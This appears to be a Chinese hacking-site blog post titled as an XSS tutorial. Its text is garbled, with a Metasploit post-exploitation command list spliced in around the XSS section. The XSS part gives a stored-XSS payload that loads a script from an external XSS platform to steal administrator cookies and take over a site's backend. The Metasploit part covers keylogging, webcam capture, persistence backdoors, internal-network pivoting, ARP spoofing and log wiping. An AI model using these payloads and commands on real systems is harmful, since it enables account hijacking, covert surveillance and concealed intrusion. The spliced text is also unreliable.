xss跨站脚本攻击(由浅入深)

xss跨站脚本攻击(由浅入深)

入侵渗透hacker2019-07-18 23:41:0436281A+A-

  1.把session会话挂到后台

  2. use post/multi/recon/local_exploit_suggester

  3.set LHOST ip

  4.set session 1

  5.exploit

  执行之后看到的结果就是针对当前系统可能提权成功的漏洞利用模块。

  键盘记录器功能keyscan:

  keyscan_start   开启记录目标主机的键盘输入

  keyscan_dump   输出截获到的目标键盘输入字符信息想要把xss玩明白了,那么就需要了解他是如何工作的,以及我们如何利用xss。

  Xss简介:XSS又叫CSS (CrossSiteScript),因为与层叠样式表(css)重名,所以叫Xss,中文名叫跨站脚本攻击。

  特点:凡是存在输入框的地方,都可能存在xss漏洞

  精髓:先闭合,在构造

  首先,我们要明白,xss是利用javascript脚本语言实现的。

  JavaScript简介:是一种属于网络的脚本语言,已经被广泛用于Web应用开发,常用来为网页添加各式各样的动态功能,为用户提供更流畅美观的浏览效果。通常JavaScript脚本是通过嵌入在HTML中来实现自身的功能的。

  Javascript的一些语法常识:

  html中的脚本必须位于<script>与</script>标签之间

  脚本可被放置在html页面的<body>和<head>部分中

  语句里面的;(分号)用于分隔javascript语句,使用分号可以一行中编写多条语句

  javascript对大小写敏感

  javascript会忽略多余的空格。

  可以在文本字符串中使用反斜杠对代码进行换行。

  Ok,基本的理解了,咱们就开始讲解利用。

  ——————————————————————————————————————–

  XSS攻击目前主要分为三种:

  1、反射型XSS

  2、存储型XSS

  3、DOM型XSS

  第一种反射型XSS:

  反射型xss:包括get类型,post类型。

  简介:当用户访问一个带有XSS代码的URL请求时,服务器端接收数据后处理,然后把带有XSS代码的数据发送到浏览器,浏览器解析这段带有XSS代码的数据后,最终造成XSS漏洞。

  精髓:向web页面注入恶意代码;这些恶意代码能够被浏览器成功的执行。

  反射型经典的XSS语句:<script>alert(“feizhu”)</script>

  GET类型:一般就是直接在url后面插入,或者搜索框插入

  建议抓包看一下,在插入的位置闭合前面的标签。

  下面这个网站输入的什么输出的就是什么,所以不需要做闭合标签,如图

  Ok,成功弹窗,说明有xss存在,很多人认为这个危害不大呀,那只说明你懂的太少,xss利用javascript中的document对象方法可以把它发挥到极致。

  例如制作钓鱼网页获取cookie:

  POST类型:

  原理跟get一样,只不过是以post类型传参,重点也是先闭合标签,再构造payload

  存储型XSS:

  这种类型的XSS,危害比前一种大得多。比如一个攻击者在论坛的楼层中包含了一段JavaScript代码,并且服务器没有正确进行过滤输出,那就会造成浏览这个页面的用户执行这段JavaScript代码。

  简单的说:此类xss是存储再数据库的,意思就是如果网站存在存储型xss,那么就可以打到管理员的cookie。其实cookie就是账号跟密码的存储值,有了它,就可以直接登陆网站后台,从而越过账号密码登陆。

  我只说一下打管理员cookie:

  利用较多的就是留言板,即可以让网站管理员看到你输入到服务器xss语句的地方,这个思路很多,我只说常见的一种。

  利用:利用现成的xss平台,或者自己搭建一个可以接受xss的平台,现在网上源码也有很多,根据需求自己搭建。

  我们在xss平台生成用于测试的xss语句,然后写到留言板提交。

  语句:<script src=https://xsspt.com/tmbUTD></script>

  好,可以看到成功插入,并未有任何过滤。

  接着咱们看xss平台是否收到cookie

  可以看到,成功拿到管理员的cookie,凭借这个就可直接登陆网站后台。

  当然实战中是不可能这么快拿到cookie的,这个是看管理员什么时候查看该留言,才可以获取到的。

  DOM型XSS:

  DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

  DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。

  特点:不需要服务器解析,触发XSS靠的是浏览器端的DOM解析。

  这个类型的xss我前天在某src挖到了一个,就不截图了,我简单说一下,这类的xss你需要掌握javascript的document对象的众多方法,我也只是简单了解一点,就不多说了。

  Ok,就到这里,下篇再更新一些常用的xss测试语句,以及绕过方法。

  keyscan_stop     停止键盘记录

  run vnc 开启远程监控画面

  webcam_stream 开启摄像头

  migrate 616 关闭对方防火墙

  screenshot  截屏

  后渗透模块使用:

  run  post/windows/gather/enum_applications 获取目标主机软件安装信息

  run post/windows/gather/dumplinks获取目标主机上最近访问过的文档、链接信息

  run post/windows/gather/enum_ie 读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码,信息存放在/root/.msf5/loot/目录下。

  msf路由转发模块:

  MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上添加一条去往“内网”的路由,此路由的下一跳转发,即网关是MSF攻击平台与被攻击目标建立的一个session会话 。

  run  get_local_subnets  查看已拿下的目标主机的内网IP段情况(路由地址)

  run autoroute -s ip/24 添加路由(把这个ip段范围加到路由)

  run autoroute -p  查看添加的路由

  +run autorouute -d  删除添加的路由

  然后,咱们可用攻击内网其他机器:

  fping -asg 192.168.93.0/24 查看内网在线主机

  arpspoof -i eth0 -t 目标IP 网关IP  ARP欺骗

  持久后门:

  run persistence -S -U -X -i 5 -p 端口 -r ip

  -S:系统启动时加载

  -U:用户登陆时加载

  -X:开机时自动加载

  -i:回连的时间间隔

  -r:你的接收shell的电脑IP

  clearev   擦除痕迹

  常用命令贴出来,方便自己及大家查阅,如有遗漏请联系我,后续不断更新完善,

  做我们大家的博客。

  本菜做了一个msf的视频教程,希望对才接触的朋友有所帮助。

  链接: https://pan.baidu.com/s/1srBjUgc937t_gXzL-yT71Q 提取码: vjjm

  解压密码:feizhu

  至此,谢谢支持。


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 1条评论
  • 山有枢2022-05-28 20:42:01
  • 。  ——————————————————————————————————————–  XSS攻击目前主要分为三种:  1、反射型XSS  2、存储型XSS  3、DOM型XSS  第一种反射型XSS:  反射型xss:包

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理